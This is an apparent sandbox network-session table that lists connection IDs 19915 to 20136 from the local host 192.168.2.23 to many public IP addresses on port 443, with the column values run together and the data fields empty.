                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19915192.168.2.235032019.163.33.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19916192.168.2.2348350104.246.231.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19917192.168.2.2355282151.19.191.220443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19918192.168.2.2353190174.190.72.88443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19919192.168.2.2334118192.126.124.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19920192.168.2.233719283.25.105.41443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19921192.168.2.2356832209.38.118.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19922192.168.2.2339450125.182.248.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19923192.168.2.2357346126.29.188.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19924192.168.2.2354240166.43.106.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19925192.168.2.2339868134.51.47.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19926192.168.2.2355154118.213.29.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19927192.168.2.233844082.95.63.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19928192.168.2.2341800117.75.18.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19929192.168.2.235719671.116.171.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19930192.168.2.2355754105.244.83.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19931192.168.2.234883041.56.165.161443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19932192.168.2.2338878121.160.52.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19933192.168.2.2345208195.87.143.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19934192.168.2.234428020.103.78.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19935192.168.2.235355436.107.246.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19936192.168.2.2354822147.73.50.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19937192.168.2.2357758131.103.184.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19938192.168.2.234293894.83.246.235443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19939192.168.2.2343918166.43.78.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19940192.168.2.2340560149.226.1.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19941192.168.2.233658049.11.215.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19942192.168.2.2338334105.90.142.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19943192.168.2.2355430218.141.249.1443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19944192.168.2.234240492.98.24.252443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19945192.168.2.23443024.251.75.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19946192.168.2.2338828216.191.20.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19947192.168.2.234505691.166.201.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19948192.168.2.234360023.191.12.36443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19949192.168.2.235291064.10.166.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19950192.168.2.2337100102.52.43.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19951192.168.2.2335714125.198.128.210443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19952192.168.2.2360130101.65.164.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19953192.168.2.234219465.200.169.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19954192.168.2.234021297.243.241.255443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19955192.168.2.233480892.82.125.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19956192.168.2.235344880.137.216.157443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19957192.168.2.234289232.242.22.46443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19958192.168.2.2352236192.33.141.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19959192.168.2.234901448.149.215.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19960192.168.2.2345006196.133.215.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19961192.168.2.234036889.74.119.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19962192.168.2.235260285.150.238.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19963192.168.2.235404857.253.22.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19964192.168.2.234515239.25.43.79443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19965192.168.2.2340734126.2.227.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19966192.168.2.235025057.32.143.77443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19967192.168.2.23350608.36.199.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19968192.168.2.23332321.201.26.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19969192.168.2.233606276.121.218.58443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19970192.168.2.2336658192.185.77.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19971192.168.2.2344542135.171.194.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19972192.168.2.235992868.119.238.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19973192.168.2.2348628191.88.17.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19974192.168.2.2337968152.145.199.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19975192.168.2.235021466.196.200.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19976192.168.2.2345136119.239.131.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19977192.168.2.233685274.63.41.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19978192.168.2.2350304147.51.180.193443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19979192.168.2.2358898120.178.95.109443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19980192.168.2.2337232184.75.169.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19981192.168.2.2341348217.150.8.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19982192.168.2.235091232.152.234.169443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19983192.168.2.2334764147.127.119.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19984192.168.2.234228895.139.74.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19985192.168.2.233459864.204.158.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19986192.168.2.235236471.22.118.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19987192.168.2.2349918148.151.106.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19988192.168.2.233475642.7.172.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19989192.168.2.2344040204.146.223.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19990192.168.2.234821269.178.129.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19991192.168.2.2357536139.49.5.91443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19992192.168.2.2340756124.131.178.11443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19993192.168.2.2350148109.80.119.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19994192.168.2.234910220.145.248.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19995192.168.2.234992458.16.133.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19996192.168.2.2356576148.139.6.185443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19997192.168.2.2347772194.179.43.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19998192.168.2.2350980163.40.96.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                19999192.168.2.2358908220.105.107.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20000192.168.2.235088873.16.61.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20001192.168.2.235587674.35.188.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20002192.168.2.235339258.180.35.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20003192.168.2.2350232218.77.86.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20004192.168.2.2348230216.118.188.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20005192.168.2.234948863.57.74.173443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20006192.168.2.2338716174.142.40.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20007192.168.2.235522225.238.117.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20008192.168.2.23436025.130.99.93443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20009192.168.2.2345102204.248.241.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20010192.168.2.2340410145.199.120.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20011192.168.2.2341790207.93.23.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20012192.168.2.236072424.146.166.224443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20013192.168.2.2345058204.211.56.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20014192.168.2.2360618162.204.196.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20015192.168.2.2354698179.5.102.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20016192.168.2.2360600144.157.96.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20017192.168.2.2339554120.40.52.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20018192.168.2.2350954172.176.133.228443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20019192.168.2.235642035.42.114.172443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20020192.168.2.2335182140.221.229.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20021192.168.2.2338206138.211.131.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20022192.168.2.234838240.147.23.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20023192.168.2.2350052190.136.140.131443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20024192.168.2.2354902189.94.214.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20025192.168.2.2349484149.36.26.217443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20026192.168.2.2355136201.243.87.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20027192.168.2.235559246.71.13.16443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20028192.168.2.23427784.239.193.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20029192.168.2.2348894123.168.25.222443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20030192.168.2.233900082.101.20.212443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20031192.168.2.234414623.131.108.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20032192.168.2.233470697.220.28.37443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20033192.168.2.2355568155.63.0.29443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20034192.168.2.23514789.229.61.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20035192.168.2.2342780181.90.128.5443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20036192.168.2.233379624.215.47.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20037192.168.2.2342014135.145.217.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20038192.168.2.2356414176.58.2.124443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20039192.168.2.235884443.96.209.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20040192.168.2.234304820.253.160.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20041192.168.2.234944872.97.94.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20042192.168.2.2342154131.143.152.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20043192.168.2.235056214.17.206.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20044192.168.2.23329469.214.248.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20045192.168.2.2346072150.108.136.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20046192.168.2.2352696107.16.0.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20047192.168.2.235226447.60.112.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20048192.168.2.2353258125.70.115.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20049192.168.2.233931424.181.181.45443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20050192.168.2.234062636.246.252.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20051192.168.2.234745448.220.85.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20052192.168.2.2332820210.108.173.97443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20053192.168.2.23551342.94.58.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20054192.168.2.2353494206.46.104.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20055192.168.2.2342542107.244.67.141443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20056192.168.2.2333558158.153.66.106443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20057192.168.2.2336694132.75.27.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20058192.168.2.2345702112.248.174.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20059192.168.2.233295643.221.163.95443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20060192.168.2.2347906126.250.114.115443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20061192.168.2.2353806110.235.154.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20062192.168.2.2355558121.27.232.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20063192.168.2.234860885.151.13.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20064192.168.2.234555844.190.100.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20065192.168.2.2335602209.97.221.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20066192.168.2.2358402116.0.153.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20067192.168.2.235731639.23.157.203443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20068192.168.2.2336864151.162.59.42443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20069192.168.2.234587818.251.216.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20070192.168.2.2341288222.122.19.18443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20071192.168.2.2334544137.189.168.47443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20072192.168.2.234775417.26.92.134443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20073192.168.2.2346402183.120.60.86443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20074192.168.2.235786017.46.206.189443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20075192.168.2.23494868.201.46.218443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20076192.168.2.2333630196.103.213.165443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20077192.168.2.2342536157.49.37.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20078192.168.2.234656624.201.72.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20079192.168.2.23526784.92.8.196443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20080192.168.2.2355454178.253.213.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20081192.168.2.2334264191.93.198.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20082192.168.2.2341240168.6.240.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20083192.168.2.2356252150.69.89.213443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20084192.168.2.23338348.246.240.81443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20085192.168.2.2349642206.99.5.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20086192.168.2.235228457.238.83.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20087192.168.2.234177286.3.76.85443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20088192.168.2.234750498.11.70.175443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20089192.168.2.2359984157.35.189.246443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20090192.168.2.2353324105.59.225.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20091192.168.2.2349396173.21.87.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20092192.168.2.2337232188.39.5.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20093192.168.2.2355982138.203.78.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20094192.168.2.234303486.106.33.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20095192.168.2.235588288.235.139.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20096192.168.2.2348932213.162.170.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20097192.168.2.2341558106.58.179.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20098192.168.2.23501088.121.18.229443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20099192.168.2.233519853.219.137.151443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20100192.168.2.2342602198.232.115.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20101192.168.2.2342264182.84.182.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20102192.168.2.2346660196.103.44.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20103192.168.2.2342578168.199.152.71443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20104192.168.2.2345684204.201.159.216443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20105192.168.2.234066047.57.210.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20106192.168.2.234713253.73.252.64443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20107192.168.2.235311412.209.153.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20108192.168.2.2343908187.125.145.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20109192.168.2.2356280212.80.128.25443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20110192.168.2.2342182151.59.157.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20111192.168.2.23365742.10.7.82443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20112192.168.2.234078472.117.106.221443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20113192.168.2.2343022123.43.15.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20114192.168.2.235919687.178.88.159443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20115192.168.2.2349532105.185.155.114443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20116192.168.2.23487845.152.26.245443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20117192.168.2.235408665.83.97.19443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20118192.168.2.2360586186.238.48.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20119192.168.2.233406677.198.52.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20120192.168.2.2359780164.165.116.129443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20121192.168.2.2359384153.46.120.253443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20122192.168.2.2343056114.181.183.33443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20123192.168.2.2350308110.190.180.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20124192.168.2.2338286145.224.71.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20125192.168.2.2349158105.108.36.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20126192.168.2.2337024178.38.3.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20127192.168.2.235001681.30.251.94443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20128192.168.2.233418884.19.47.145443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20129192.168.2.2345272184.63.231.170443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20130192.168.2.2343442163.154.204.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20131192.168.2.234969296.219.62.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20132192.168.2.233617862.40.130.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20133192.168.2.23526381.196.15.44443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20134192.168.2.2348884126.20.254.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20135192.168.2.2340352211.233.28.20443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                20136192.168.2.2353536134.145.163.90443
